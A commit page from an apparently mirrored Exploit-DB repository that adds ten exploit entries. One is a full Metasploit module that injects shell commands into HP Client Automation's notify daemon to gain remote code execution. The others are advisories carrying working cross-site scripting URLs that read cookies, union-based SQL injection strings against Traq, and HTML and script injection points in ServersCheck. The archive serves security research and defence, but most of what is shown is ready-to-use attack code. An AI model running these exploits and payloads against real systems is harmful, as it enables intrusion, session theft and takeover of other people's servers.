bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Update: 2015-02-26

Browse source 
10 new exploits
This commit is contained in:
Offensive Security 2015-02-26 08:36:02 +00:00
parent d944419211
commit cb77af20aa
11 changed files with 644 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
files.csv
View file

@ -32599,3 +32599,13 @@ id,file,description,date,author,platform,type,port
36166,platforms/php/webapps/36166.txt,"BuddyPress 1.2.10, WordPress 3.1.x, DEV Blogs Mu 1.2.6 Regular Subscriber HTML Injection Vulnerability",2011-09-26,knull,php,webapps,0
36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 Cross Site Scripting And Information Disclosure Vulnerabilities",2011-09-26,"Stefan Schurtz",php,webapps,0
36168,platforms/php/webapps/36168.txt,"Serendipity Freetag-plugin <= 3.23 'serendipity[tagview]' Cross Site Scripting Vulnerability",2011-09-26,"Stefan Schurtz",php,webapps,0
36169,platforms/multiple/remote/36169.rb,"HP Client Automation Command Injection",2015-02-24,metasploit,multiple,remote,3465
36170,platforms/php/webapps/36170.txt,"PunBB <= 1.3.6 'browse.php' Cross-Site Scripting Vulnerability",2011-09-26,Amir,php,webapps,0
36171,platforms/php/webapps/36171.txt,"Joomla! 'com_biitatemplateshop' Component 'groups' Parameter SQL Injection Vulnerability",2011-09-26,"BHG Security Group",php,webapps,0
36172,platforms/cfm/webapps/36172.txt,"Adobe ColdFusion 7 Multiple Cross Site Scripting Vulnerabilities",2011-09-27,MustLive,cfm,webapps,0
36173,platforms/php/webapps/36173.txt,"Vanira CMS 'vtpidshow' Parameter SQL Injection Vulnerability",2011-09-27,"kurdish hackers team",php,webapps,0
36174,platforms/windows/remote/36174.txt,"ServersCheck Monitoring Software 8.8.x Multiple Remote Security Vulnerabilities",2011-09-27,Vulnerability-Lab,windows,remote,0
36175,platforms/php/webapps/36175.txt,"Traq 2.2 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2011-09-28,"High-Tech Bridge SA",php,webapps,0
36176,platforms/php/webapps/36176.txt,"Joomla! 1.7.0 and Prior Multiple Cross Site Scripting Vulnerabilities",2011-09-29,"Aung Khant",php,webapps,0
36177,platforms/php/webapps/36177.txt,"Bitweaver 2.8.1 Multiple Cross-Site Scripting Vulnerabilities",2011-09-29,"Stefan Schurtz",php,webapps,0
36178,platforms/php/webapps/36178.txt,"WordPress Atahualpa Theme 3.6.7 's' Parameter Cross Site Scripting Vulnerability",2011-09-29,SiteWatch,php,webapps,0

Can't render this file because it is too large.

13
platforms/cfm/webapps/36172.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/49787/info
Adobe ColdFusion is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Adobe ColdFusion 7 is vulnerable; other versions may also be affected.
http://example.com/CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=alert(document.cookie)%3E
http://example.com/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(document.cookie)%3E
http://example.com/CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(document.cookie)%3E

130
platforms/multiple/remote/36169.rb Executable file
View file

@ -0,0 +1,130 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Client Automation Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability on HP Client Automation, distributed
actually as Persistent Systems Client Automation. The vulnerability exists in the Notify
Daemon (radexecd.exe), which doesn't authenticate execution requests by default neither.
This module has been tested successfully on HP Client Automation 9.00 over Windows 2003 SP2
and CentOS 5.
},
'Author' =>
[
'Ben Turner', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2015-1497'],
['ZDI', '15-038'],
['URL', 'https://radiasupport.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features']
],
'Privileged' => true,
'Platform' => %w{ unix win },
'DefaultOptions' =>
{
'WfsDelay' => 10
},
'Payload' => {'DisableNops' => true},
'Targets' =>
[
[ 'HP Client Automation 9.0.0 / Linux',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 466,
'EncoderType' => Msf::Encoder::Type::CmdUnixPerl,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'openssl telnet generic gawk'
},
'BadChars' => "\x27"
}
}
],
[ 'HP Client Automation 9.0.0 / Windows',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 02 2014'))
register_options(
[
Opt::RPORT(3465)
], self.class)
deregister_options('CMDSTAGER::FLAVOR')
deregister_options('CMDSTAGER::DECODER')
end
def check
connect
sock.put("\x00") # port
sock.put("#{rand_text_alphanumeric(4 + rand(3))}\x00") # user ID
sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
sock.put("hide\x00") # command
res = sock.get_once
disconnect
if res && res.unpack('C')[0] == 0
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def exploit
case target['Platform']
when 'win'
print_status('Exploiting Windows target...')
execute_cmdstager({:flavor => :vbs, :linemax => 290})
when 'unix'
print_status('Exploiting Linux target...')
exploit_unix
else
fail_with(Failure::NoTarget, 'Invalid target')
end
end
def exploit_unix
connect
sock.put("\x00") # port
sock.put("0\x00") # user ID
sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
sock.put("hide hide\x09sh -c '#{payload.encoded.gsub(/\\/, "\\\\\\\\")}'\x00") # command, here commands can be injected
disconnect
end
def execute_command(cmd, opts = {})
connect
sock.put("\x00") # port
sock.put("S-1-5-18\x00") # user ID
sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
sock.put("hide hide\"\x09\"cmd.exe /c #{cmd}&\"\x00") # command, here commands can be injected
res = sock.get_once
disconnect
unless res && res.unpack('C')[0] == 0
fail_with(Failure::Unknown, "Something failed executing the stager...")
end
end
end

7
platforms/php/webapps/36170.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/49776/info
PunBB is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/browse.php?keywords=[xss]&search=Search&projects=1&styles=1&forums=1

7
platforms/php/webapps/36171.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/49786/info
The 'com_biitatemplateshop' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_biitatemplateshop&groups=[SQLI]

7
platforms/php/webapps/36173.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/49789/info
Vanira CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/voteshow.php?vact=ok&vtpidshow=1 [SQL insertion attacks]

42
platforms/php/webapps/36175.txt Executable file
View file

@ -0,0 +1,42 @@
source: http://www.securityfocus.com/bid/49835/info
Traq is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Traq 2.2 is vulnerable; prior versions may also be affected.
1) Multiple cross-site scripting vulnerabilities that affect the &#039;edit&#039; parameter of the following scripts:
http://www.example.com/admincp/components.php?edit=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/admincp/ticket_templates.php?edit=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/admincp/custom_fields.php?edit=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/admincp/groups.php?edit=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
2) Multiple cross-site scripting vulnerabilities that affect the &#039;errors&#039; parameter of the following scripts:
http://www.example.com/admincp/components.php?edit&error&errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/sc ript%3E
http://www.example.com/admincp/groups.php?edit&errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/admincp/milestones.php?edit&errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/admincp/plugins.php?create&errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/admincp/projects.php?edit&errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/admincp/repositories.php?edit&errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/admincp/users.php?edit&errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Successful exploitation of the vulnerabilities requires that "register_globals" is enabled.
3) A cross-site scripting vulnerability affects the &#039;goto&#039; parameter of the &#039;user/login&#039; script:
http://www.example.com/user/login?goto=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
4) Multiple SQL-injection vulnerability affects the &#039;sort&#039;, &#039;order&#039;, &#039;component&#039;, &#039;milestone&#039;, &#039;priority&#039;, &#039;severity&#039;, &#039;status&#039;, &#039;type&#039;, &#039;version&#039; parameters of the &#039;tickets&#039; scripts:
http://www.example.com/[PROJECT_ID]/tickets?sort=SQL_CODE_HERE
http://www.example.com/[PROJECT_ID]/tickets?order=SQL_CODE_HERE
http://www.example.com/[PROJECT_ID]/tickets?columns=ticket&component=1%29/**/union/**/select/**/1,version%28%29,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/where/**/1/**/in/**/%281
http://www.example.com/[PROJECT_ID]/tickets?columns=ticket&milestone=1%29/**/union/**/select/**/1,version%28%29,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/where/**/1/**/in/**/%281
http://www.example.com/[PROJECT_ID]/tickets?columns=ticket&priority=1%29/**/union/**/select/**/1,version%28%29,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/where/**/1/**/in/**/%281
http://www.example.com/[PROJECT_ID]/tickets?columns=ticket&severity=1%29/**/union/**/select/**/1,version%28%29,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/where/**/1/**/in/**/%281
http://www.example.com/[PROJECT_ID]/tickets?columns=ticket&status=1%29/**/union/**/select/**/1,version%28%29,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/where/**/1/**/in/**/%281
http://www.example.com/[PROJECT_ID]/tickets?columns=ticket&type=1%29/**/union/**/select/**/1,version%28%29,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/where/**/1/**/in/**/%281
http://www.example.com/[PROJECT_ID]/tickets?columns=ticket&version=1%29/**/union/**/select/**/1,version%28%29,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/where/**/1/**/in/**/%281

16
platforms/php/webapps/36176.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/49853/info
Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker could leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! 1.7.0 and prior are vulnerable.
http://example.com/joomla17_noseo/administrator/index.php?option=com_categories&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22
http://example.com/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22&author=
http://example.com/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=&author=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22

30
platforms/php/webapps/36177.txt Executable file
View file

@ -0,0 +1,30 @@
source: http://www.securityfocus.com/bid/49864/info
Bitweaver is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Bitweaver 2.8.1 is vulnerable; other versions may also be affected.
http://www.example.com/bitweaver/users/register.php/"</script><script>alert(document.cookie)</script>
http://www.example.com/bitweaver/blogs/rankings.php/"</script><script>alert(document.cookie)</script>
http://www.example.com/bitweaver/articles/edit.php/"</script><script>alert(document.cookie)</script>
http://www.example.com/bitweaver/articles/list.php/"</script><script>alert(document.cookie)</script>
http://www.example.com/bitweaver/calendar/index.php/"</script><script>alert(document.cookie)</script>
http://www.example.com/bitweaver/events/list_events.php/"</script><script>alert(document.cookie)</script>
http://www.example.com/bitweaver/events/index.php/"</script><script>alert(document.cookie)</script>
http://www.example.com/bitweaver/pigeonholes/list.php/"</script><script>alert(document.cookie)</script>
http://www.example.com/bitweaver/fisheye/index.php/"</script><script>alert(document.cookie)</script>
http://www.example.com/bitweaver/recommends/index.php/"</script><script>alert(document.cookie)</script>
http://www.example.com/bitweaver/rss/index.php/"</script><script>alert(document.cookie)</script>
http://www.example.com/bitweaver/fisheye/list_galleries.php/"</script><script>alert(document.cookie)</script>
http://www.example.com/bitweaver/tags/"</script><script>alert(document.cookie)</script>
http://www.example.com/bitweaver/stencils/index.php/"</script><script>alert(document.cookie)</script>
http://www.example.com/bitweaver/stencils/list_stencils.php/"</script><script>alert(document.cookie)</script>
http://www.example.com/bitweaver/wiki/orphan_pages.php/"</script><script>alert(document.cookie)</script>
http://www.example.com/bitweaver/users/remind_password.php/"</script><script>alert(document.cookie)</script>
http://www.example.com/bitweaver/blogs/list_blogs.php/"</script><script>alert(document.cookie)</script>
http://www.example.com/bitweaver/liberty/list_content.php/"</script><script>alert(document.cookie)</script>
http://www.example.com/bitweaver/quicktags/special_chars.php?textarea_id=&#039;);"/><script>alert(document.cookie);</script>
http://www.example.com/bitweaver/users/register.php -> Email -> &#039;"</script><script>alert(document.cookie)</script> -> Register

9
platforms/php/webapps/36178.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49865/info
The Atahualpa theme for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Versions prior to Atahualpa 3.6.8 are vulnerable.
http://www.example.com/?s=%26%23039;%2balert(123)%2b%26%23039;

373
platforms/windows/remote/36174.txt Executable file
View file

@ -0,0 +1,373 @@
source: http://www.securityfocus.com/bid/49793/info
ServersCheck Monitoring Software is prone to multiple remote input-validation vulnerabilities, including:
1. Multiple HTML-injection vulnerabilities
2. Multiple cross-site scripting vulnerabilities
3. A cross-site request forgery vulnerability
4. Multiple local file-include vulnerabilities
5. A security vulnerability that may allow attackers to send arbitrary SMS messages from the vendor's phone number.
An attacker can exploit these issues to execute arbitrary HTML and script code in the context of the browser or the Web server, gain access to sensitive information, send multiple SMS messages, and perform certain administrative tasks. Other attacks are also possible.
Code Review: Input Validation Vulnerabilities (Persistent)
http://www.example.com/userslist.html?
<table border="0" cellpadding="0" cellspacing="0" class="tabdata"
width=&#039;98%&#039;>
<tr bgcolor="#ff9900">
<td width=90%><b>Benutzername</b></td>
<td align=center><b>Zugriffsrechte</b></td>
<td align=center><b>Löschen</b></td></tr>
<tr bgcolor=&#039;#ffef95&#039;><td style=&#039;padding-left:3px;padding-right:3px;&#039;><a
href=&#039;/usersettingsedit.html?username=
> >"<INSERT SCRIPTCODE HERE!>&&#039;>>"<INSERT OWN PERSISTENT SCRIPTCODE
HERE!!!></a></td>
<td align=center><a href="/usersettingsedit.html?username=>"<INSERT OWN
PERSISTENT SCRIPTCODE HERE!!!>">
<img src="/output/images/security.gif" border=0></a></td>
<td align=center><a href=&#039;&#039; onclick="return deleteit(&#039;0&#039;);"><img
src=&#039;/output/images/delete.gif?&#039; border=0></a></td>
</tr><tr ><td style=&#039;padding-left:3px;padding-right:3px;&#039;><a
href=&#039;/usersettingsedit.html
?username=>"<iframe src=http://test.de>&&#039;>>"<INSERT OWN PERSISTENT
SCRIPTCODE HERE!!!></a></td>
<td align=center><a href="/usersettingsedit.html?username=>"<INSERT OWN
PERSISTENT SCRIPTCODE HERE!!!>">
<img src="/output/images/security.gif" border=0></a></td>
<td align=center><a href=&#039;&#039; onclick="return deleteit(&#039;1&#039;);"><img
src=&#039;/output/images/delete.gif?&#039; border=0></a></td>
</tr></table><br><form action=usersadd.html method=post><td><input
type=hidden name=add value=yes>
<input type=submit value="NEUEN BENUTZER HINZUFüGEN" ></form>
http://www.example.com/downtime.html
<body bgcolor="white" leftmargin=0 topmargin=0 rightmargin=0 marginwidth=0>
<div style=&#039;padding-left:5px;padding-top:5px;&#039;><font color=black
style="font-size: 16px;"><strong>
Downtime Bericht >"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!> (1171011122)
</strong></font>
<hr align="left" width="97%" size="1" color="#ff9900" noshade
style="padding-top:0px; filter:progid:DXImageTransform.Microsoft.
Gradient(startColorStr=&#039;#ffcc00&#039;, endColorStr=&#039;white&#039;, gradientType=&#039;1&#039;)">
<br><div id="overDiv" style="position:absolute; visibility:hidden;
z-index:1000;"></div>
http://www.example.com/windowsaccountslist.html
<table border="0" cellpadding="0" cellspacing="0" class="tabdata">
<tr bgcolor="#ff9900">
<td><b>Benutzername</b></td>
<td align=center><b>Löschen</b></td>
</tr>
<tr bgcolor=&#039;#ffef95&#039;><td style=&#039;padding-left:3px;padding-right:3px;&#039;><a
href=&#039;/windowsaccountsedit.html?id=
1269018355&&#039;>>"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!></a></td>
<td align=center><a href=&#039;&#039; onclick="return
deleteit(&#039;1269018355&#039;);"><img src=&#039;/output/images/delete.gif?&#039;
border=0></a></td>
</tr></table><br>
<form action=windowsaccountsedit.html method=post><td><input type=hidden
name=add value=yes>
<input type=submit value="NEUEN BENUTZER HINZUFüGEN" ></form>
http://www.example.com/msnsettings.html
<div id="overDiv" style="position:absolute; visibility:hidden;
z-index:1000;"></div>
<script langauge="JavaScript" src="/output/js/overlib.js?"></script>
<div style=&#039;padding-left:5px;padding-top:5px;&#039;><font color=black
style="font-size: 16px;"><strong>
Konfiguriere MSN Warnung
</strong></font>
<hr align="left" width="97%" size="1" color="#ff9900" noshade
style="padding-top:0px; filter:progid:DXImageTransform.Microsoft.Gradient
(startColorStr=&#039;#ffcc00&#039;, endColorStr=&#039;white&#039;, gradientType=&#039;1&#039;)">
<br>Sie müssen ein MSN Konto festlegen, von dem das MSN basierten
Warnungen geschickt werden.<br>
<script language="JavaScript">
alert(&#039;Einstellungen gespeichert&#039;);
</script><div id=&#039;stylized&#039; class=&#039;settingsform&#039;>
<form method=post action=msnsettings.html name=msn>
<input type=hidden name=setting value=&#039;MSN&#039;>
<label>MSN Konto Name</label><input type=text name=account size=30
value=">"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!>"><br>
<label>MSN Konto Passwort</label><input type=password name=password
size=10 value=">"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!>"<br>
<br><br><input type=submit class=&#039;buttonok&#039; value="EINSTELLUNGEN
SPEICHERN" ></form></div>
<br><br></table><br><br> </td></tr></table>
http://www.example.com/enterprisesettings2.html
<form method=post action=enterprisesettings2.html>
<input type=hidden name=setting value=&#039;SNMPTRAP&#039;>
<input type=hidden name=stop value=&#039;&#039;>
<label>IP, an die die Traps gesendet werden</label><input type=text
name=newsetting0 size=30 value="127.0.0.1" >
<a onmouseover="return overlib(&#039;Geben Sie eine IP Adresse oder einen
Domänennamen ein, an welche die Traps gesendet
werden&#039;, LEFT);" onmouseout="return nd();"><img
src="/output/images/info.gif?" border=0 alt=&#039;Info&#039;></a><br>
<label>Port</label><input type=text name=newsetting1 size=30
value=">"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!><br>
<label>Der Community String.</label><input type=text name=newsetting2
size=30 value="" ><br>
<br><br><input type=hidden value="127.0.0.1<X>>"<INSERT OWN PERSISTENT
SCRIPTCODE HERE!!!>" name=previoussetting><input type=hidden value=""
name=check><input type=submit class=&#039;buttonok&#039; value="EINSTELLUNGEN
SPEICHERN" > <input type=button
value="SENDUNG VON SNMP TRAPS BEENDEN" class=&#039;buttonnok&#039;
Onclick="this.form.stop.value=1; this.form.submit();"></form></div>
<br><br></table><br><br> </td></tr></table>
http://www.example.com/settings.html?setting=LOGGING&
<label>Datenbank Vorlagen</label><select name=odbctemplate
onchange="javascript:changetemplate();">
<option value="">Wähle eine Datenbank Vorlage</option>
<option value="Driver={Oracle ODBC
Driver};Dbq=myDBName;Uid=myUsername;Pwd=myPassword">Oracle ODBC
Driver</option>
<option value="Driver={Microsoft ODBC for
Oracle};Server=OracleServer.world;Uid=myUsername;Pwd=myPassword">Microsoft
Oracle ODBC Driver</option>
<option value="Driver={INFORMIX 3.30 32
BIT};Host=hostname;Server=myserver;Service=service-name;Protocol=olsoctcp;Database=mydb;UID=username;PWD=myPwd
">Informix 3.30 ODBC Driver</option>
<option value="Driver={Pervasive ODBC Client
Interface};ServerName=srvname;dbq=">Pervasive ODBC Driver</option>
<option value="Driver={SQL Server}; Server=(local); Database=myDBName;
UID=sa; PWD=;">MS SQL ODBC Driver</option>
<option value="Driver={SQL Server Native Client 10.0};
Server=enter_IP_here; Database=enter_db_name_here;
UID=enter_account_name_here;
PWD=enter_password_here;">MS SQL 2008</option>
<option value="Driver={Microsoft Access Driver (*.mdb)};
DBQ=C:myDBName.mdb">MS Access ODBC Driver</option>
<option value="Driver={Microsoft Excel Driver (*.xls)};DBQ=physical path
to .xls file; DriverID=278;">MS Excel ODBC Driver</option>
<option value="Driver={Microsoft Text Driver
(*.txt;*.csv)};DefaultDir=physical path to .txt file;">Text ODBC
Driver</option>
<option value="DRIVER={MySQL ODBC 3.51
Driver};SERVER=;DATABASE=;USER=;Password=">mySQL ODBC 3.51</option>
</select><br><label>ODBC Verbindungsstring</label><input type=text
name=newsetting0 size=50 value=">"<INSERT SCRIPTCODE HERE!>" ><br><br>
<label>Speichere Werte in der Datenbank</label><input type=checkbox
name=newsetting1 value="true" > Ja<br><br><br>
<input type=hidden value=">"<INSERT OWN PERSISTENT SCRIPTCODE
HERE!!!><X><X><X><X>" name=previoussetting><input
type=hidden value="ODBC" name=check>
<input type=submit value="EINSTELLUNGEN SPEICHERN" class=&#039;buttonok&#039;>
<input type=button class=&#039;buttonnok&#039; value="DATABANKERFASSUNG BEENDEN"
Onclick="this.form.stop.value=1; this.form.submit();"></form>
</div><br><br></table><br><br> </td></tr></table>
<label>ODBC Verbindungsstring</label><input type=text name=newsetting0
size=50 value=">"<iframe src=http://vulnerability-lab.com width=600
height=600>"
> ><br><br><label>Speichere Werte in der Datenbank</label><input
type=checkbox name=newsetting1 value="true" > Ja<br><br><br>
<input type=hidden value=">"<INSERT OWN PERSISTENT SCRIPTCODE
HERE!!!><X><X><X><X>" name=previoussetting><input type=hidden
value="ODBC" name=check>
<input type=submit value="EINSTELLUNGEN SPEICHERN" class=&#039;buttonok&#039;>
<input type=button class=&#039;buttonnok&#039; value="DATABANKERFASSUNG BEENDEN"
Onclick="this.form.stop.value=1; this.form.submit();"></form>
</div>
References:
http://www.example.com/userslist.html?
http://www.example.com/teamslist.html?
http://www.example.com/windowsaccountsedit.html
http://www.example.com/bulkedit.html?
http://www.example.com/msnsettings.html
http://www.example.com/enterprisesettings2.html
http://www.example.com/settings.html?setting=LOGGING&
1.2
Code Review: Input Validation Vulnerabilities (Non Persistent)
http://www.example.com/checks2def.html
<form action=checks3other.html method=post name=checksdef
onSubmit=&#039;return checkrequired(this)&#039;>
<input type=hidden name=linenumber value=">"<NON-PERSITENT SCRIPTCODE
HERE!>"><input type=hidden name=type value="">
<input type=hidden name=addcheck value=""><input type=hidden
name=editsettings value="1">
<input type=hidden name=uidrule value="1171011122">
<input type=hidden name=id value="1171011122">
<input type=hidden name=required_label value="1171011122">
<input type=hidden name=devicegraphs value=""><tr>
<td>Überwachungregel Bezeichnung</td><td><input type=text size=35
name=namevisible value="WINDOWSHEALTH" style=&#039;width:250px;&#039;></td><td>
</td></tr><tr><td>Geräte-Name</td><td>
http://www.example.com/check2alerts.html
<form method=post action=checks2alerts.html name=alerts
target="main"><td> <td><input type=hidden value=""
name=linenumber><input type=hidden value="" name=check> <input
type=button value=&#039;FEHLER MELDUNGEN&#039; alt="/checks2alerts.html?
linenumber=&check=&type=down&KeepThis=true&TB_iframe=true&height=400&width=850"
title=&#039;Bearbeite Alarme für den FEHLER
Status&#039; class=&#039;thickbox buttonalertsdown&#039;></td></form>
<form method=post action="" name=alerts target="main" ><td>
</td><td><input class=&#039;buttonnok&#039; type=submit value="
REGEL LöSCHEN" onclick="return deleteit(&#039;>"<NON-PERSITENT SCRIPTCODE
HERE!&#039;,&#039;&#039;);" onmouseover="return overlib(&#039;Durch klicken auf dieses Icon
können
Sie die Überwachungsregel löschen. Diese Operation kann nicht rückgängig
gemacht werden.&#039;, LEFT);" onmouseout="return nd();"></td></form>
</tr></table></div><br><br>
http://www.example.com/viewalerts.html
<div style=&#039;padding-left:5px;padding-top:5px;&#039;><font color=black
style="font-size: 16px;"><strong>
Regel Historie >"<NON-PERSITENT SCRIPTCODE HERE!> (<a
href="/viewfile.html?file=\checkslogs\1171011122.log">1171011122</a>)
</strong></font><hr align="left" width="97%" size="1" color="#ff9900"
noshade style="padding-top:0px; filter:
progid:DXImageTransform.Microsoft.Gradient(startColorStr=&#039;#ffcc00&#039;,
endColorStr=&#039;white&#039;, gradientType=&#039;1&#039;)">
<br>
http://www.example.com/downtime.html
<body bgcolor="white" leftmargin=0 topmargin=0 rightmargin=0 marginwidth=0>
<div style=&#039;padding-left:5px;padding-top:5px;&#039;><font color=black
style="font-size: 16px;"><strong>
Downtime Bericht >"<NON-PERSITENT SCRIPTCODE HERE!> (1171011122)
</strong></font>
<hr align="left" width="97%" size="1" color="#ff9900" noshade
style="padding-top:0px; filter:progid:DXImageTransform.Microsoft.
Gradient(startColorStr=&#039;#ffcc00&#039;, endColorStr=&#039;white&#039;, gradientType=&#039;1&#039;)">
<br><div id="overDiv" style="position:absolute; visibility:hidden;
z-index:1000;"></div>
Non Persistent References:
http://www.example.com/checks2def.html?id=
http://www.example.com/checks2def.html?id=1171011122&linenumber=6&check=
http://www.example.com/checks2def.html?id=1171011122&linenumber=
http://www.example.com/downtime.html?label=
http://www.example.com/downtime.html?label=1171011122&keyz=1171011122WINDOWSHEALTH&labelvisible=
http://www.example.com/timeline/timeline.html?xml=
http://www.example.com/devicegraphs.html?device=
http://www.example.com/viewgraphs.html?label=
http://www.example.com/viewalerts.html?label=1171011122&labelvisible=
1.3
Code Review: Cross Site Request Forgery (Force|Non Persistent)
<body bgcolor="white" leftmargin=0 topmargin=0 rightmargin=0 marginwidth=0>
<div
style="padding-left:5px;padding-right:5px;padding-top:10px;padding-bottom:10px;width:90%">
<img src="/output/images/generalsettings.jpg" border="0" align="left">
<div style=&#039;padding-left:5px;padding-top:5px;&#039;><font color=black
style="font-size: 16px;"><strong>
Definere Einstellungen zur Dienstanmeldung.
</strong></font>
<hr align="left" width="97%" size="1" color="#ff9900" noshade
style="padding-top:0px; filter:progid:DXImageTransform.Microsoft.Gradient
(startColorStr=&#039;#ffcc00&#039;, endColorStr=&#039;white&#039;, gradientType=&#039;1&#039;)"> <br>
ServersCheck läuft als ein Dienst auf diesem Computer. Standardmäßig
laufen alle Dienste von Windows unter dem lokalen Systemkonto.
Ein Dienst hat Zugang auf die Maschine, wo er gerade läuft, aber es ist
ihm ein Remotezugriff andere Computer untersagt. Für Windows
basierende Checks (Plattenspeicherplatz, Speicher, CPU...), muss der
ServersCheck Monitoring-Dienst unter einem Windows Admin-Konto
laufen.<br><br>
Setze hier die Domäne oder den System-Admin Benutzernamen mit Passwort.
Zum Auslassen dieser Option bitte leer lassen.<br><br>
<form action=popup_service2.html method=post name=service setting><table
cellpadding=5><tr><td>
Administrator Benutzername</td><td align=right>
<input type=text size=20 name=user></td></tr><tr><td>
Administrator Passwort</td><td align=right>
<input type=password size=20 name=pass></td></tr></table>
<br><br><input type=submit class=&#039;buttonok&#039; value=">> AKTUALISIERUNG" >
<input type=button class=&#039;buttonnok&#039;
value="SKIP" Onclick="window.location=&#039;/popup1.html&#039;;">
</form></div></div><br><br>
